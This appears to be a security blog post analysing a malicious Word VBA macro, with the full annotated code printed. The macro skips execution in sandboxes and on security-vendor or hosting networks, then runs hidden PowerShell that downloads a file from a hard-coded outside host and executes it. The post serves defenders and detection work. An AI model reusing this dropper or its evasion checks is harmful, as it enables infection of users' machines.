.DownloadFile('http://silkflowersdecordesign.com/admin/worddata.dat', $f);(New-Object -com WScript.Shell).Exec($f)
What's interesting, or a bit different, about this payload compared with others is that the attacker is trying to perform "Security Researcher Detection". Similar to how some malware performs VMware detection in order to disable itself if it's being run in a virtual machine, this malware disables itself if it's being run from within a security research corporation's IP subnet. How? The attacker is actually pulling your geolocation from maxmind.com (the blacklist below is made up of vendor, hosting and data-centre names, so what is really being matched is the ISP/organisation information that comes back with the lookup)
xmlHttp.Open "GET", "https://www.maxmind.com/geoip/v2.1/city/me", False
and the attacker has a blacklist
Blacklist = Array( 'Return
"FORTINET", _
...
"TREND MICRO", _
...
"FIREEYE", _
and if, for example, the response contained the text FIREEYE (a leading security research company),
then the malware would disable itself.
If BlacklistHit Then Error 102
So security researchers should be aware of code/attacks like this that may deliberately do nothing depending on how or where you run it.
Edit: Mistakenly typed Powershell instead of VBA in title. It's VBA that calls powershell.
The code
' Run-once guard: set the first time the Painted event fires so repeated repaints
' of the control do not re-run ExecutePayload (see InkPicture1_Painted).
Dim gContinue As Boolean
' Entry point. The macro is wired to the Painted event of an InkPicture ActiveX control
' instead of the usual AutoOpen / Document_Open names, so presumably it fires when the
' control is drawn (detection note: sweep documents for embedded Ink controls and
' *_Painted handlers, not only the classic auto-run macro names).
Public Sub InkPicture1_Painted(ByVal Param1 As Long, ByVal Param2 As IInkRectangle)
' Every runtime error - including the deliberate Error 101 / 102 / 201 raised further
' down - ends up at x_Error and the Sub exits silently, so the user sees nothing and
' a "hostile" environment simply gets no payload.
On Error GoTo x_Error
' Only the first paint does any work.
If gContinue Then Exit Sub
gContinue = True
ExecutePayload
Exit Sub
x_Error:
' Empty handler: errors are swallowed, nothing is logged or shown.
End Sub
' Stage 2: two environment checks, then a hidden PowerShell download-and-execute.
' Error 101 / 102 are raised on purpose; there is no handler in this Sub, so they
' propagate to the caller's On Error and the macro quietly stops.
Public Sub ExecutePayload()
' Sandbox heuristic: a Word profile with fewer than 3 recent files is treated as a throw-away box.
If RecentFileCountTooLow Then Error 101
' Vendor / researcher heuristic: abort if the GeoIP lookup response matches the Blacklist.
If BlacklistHit Then Error 102
Set WScriptShell = CreateObject("WScript.Shell")
' Detection / mitigation points: winword.exe spawning powershell.exe with
' -ExecutionPolicy Bypass -WindowStyle Hidden, a WebClient download of the
' hard-coded URL into a %TEMP% file from GetTempFileName(), then a second
' WScript.Shell launching that file. The trailing 0 is the Run window style
' (hidden), so no console window appears.
WScriptShell.Run "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -command $f=[System.IO.Path]::GetTempFileName();(New-Object System.Net.WebClient).DownloadFile('http://silkflowersdecordesign.com/admin/worddata.dat', $f);(New-Object -com WScript.Shell).Exec($f)", 0
Exit Sub
End Sub
' Sandbox check: True when Word's RecentFiles list holds fewer than 3 entries.
' Presumably the assumption is that a freshly built analysis VM has opened few
' documents, while a real user's machine has a longer history - TODO confirm.
Public Function RecentFileCountTooLow() As Boolean
RecentFileCountTooLow = RecentFiles.Count < 3
End Function
' Module-level holder for the upper-cased GeoIP response body, filled in by BlacklistHit.
Dim City As String
' Returns True when the upper-cased GeoIP response contains any Blacklist entry.
' The test is a plain InStr over the *whole* response text, not the city field, so it
' matches on whatever ISP / organisation names the lookup returns; generic entries such
' as "CLOUD", "SERVER" or "SECURITY" will also trip it on many ordinary hosting networks.
' If GetCity raises Error 201 (lookup blocked or non-200), that error propagates through
' here and ExecutePayload to the top-level handler, so the payload never runs.
Public Function BlacklistHit() As Boolean
City = UCase(GetCity)
For Each Value In Blacklist
' Case-insensitive substring match: list entries are already upper-case, City was upper-cased above.
If InStr(City, Value) <> 0 Then GoTo InBlacklist
Next
' No match: function returns its default value (False).
Exit Function
InBlacklist:
BlacklistHit = True 'Return
End Function
' Substrings that make BlacklistHit abort the infection. Three families are visible:
' security vendors (FORTINET, TREND MICRO, FIREEYE, ...), hosting / cloud providers
' (AMAZON, OVH SAS, HETZNER, LEASEWEB, ...) and generic data-centre words
' (SERVER, HOSTED, DATACENTER, CLOUD, ...). All entries are upper-case to match the
' UCase'd response. Useful as a detection artefact: this exact list appearing in a
' document macro is a strong indicator on its own.
Public Function Blacklist()
Blacklist = Array( 'Return
"FORTINET", _
"CISCO", _
"TREND MICRO", _
"RACKSPACE", _
"HOSTING", _
"STRONG TECHNOLOGIES", _
"DATA CENTER", _
"IRON PORT", _
"BLUECOAT", _
"BLUE COAT", _
"VMVAULT", _
"MESSAGELABS", _
"MICROSOFT", _
"MIMECAST", _
"LEASEWEB", _
"BLACKOAKCOMPUTERS", _
"ESET, SPOL", _
"SERVER", _
"DATACENTER", _
"BITDEFENDER", _
"DATACENTRE", _
"OVH SAS", _
"NFORCE", _
"TRENDMICRO", _
"ANONYMOUS", _
"CLOUD", _
"AMAZON", _
"HISPEED.CH", _
"HOSTED", _
"IRONPORT", _
"PALO ALTO", _
"PROOFPOINT", _
"SECURITY", _
"TRUSTWAVE", _
"FORCEPOINT", _
"DEDICATED", _
"HETZNER", _
"FIREEYE", _
"ZSCALER"
)
End Function
' Looks up the machine's own public IP via MaxMind's GeoIP "me" endpoint and returns the
' raw response body (the name is misleading: nothing is parsed, the caller searches the
' whole text). The spoofed Referer and browser-like User-Agent make the request look like
' a visit to MaxMind's "locate my IP" page rather than an Office macro.
' Mitigation / detection: a synchronous WinHttp request to maxmind.com originating from
' winword.exe is unusual; if the request is blocked or returns anything but 200 the
' function raises Error 201 and the whole chain aborts before the download stage.
Public Function GetCity() As String
Set xmlHttp = CreateObject("WinHttp.WinHttpRequest.5.1")
' Third argument False = synchronous request; Send blocks until the response arrives.
xmlHttp.Open "GET", "https://www.maxmind.com/geoip/v2.1/city/me", False
xmlHttp.SetRequestHeader "Referer", "https://www.maxmind.com/en/locate-my-ip-address"
xmlHttp.SetRequestHeader "User-Agent", "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
xmlHttp.Send
' Any non-200 (rate limit, block page, proxy denial) is fatal for the macro.
If xmlHttp.Status <> 200 Then Error 201
GetCity = xmlHttp.ResponseText 'Return
End Function
Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.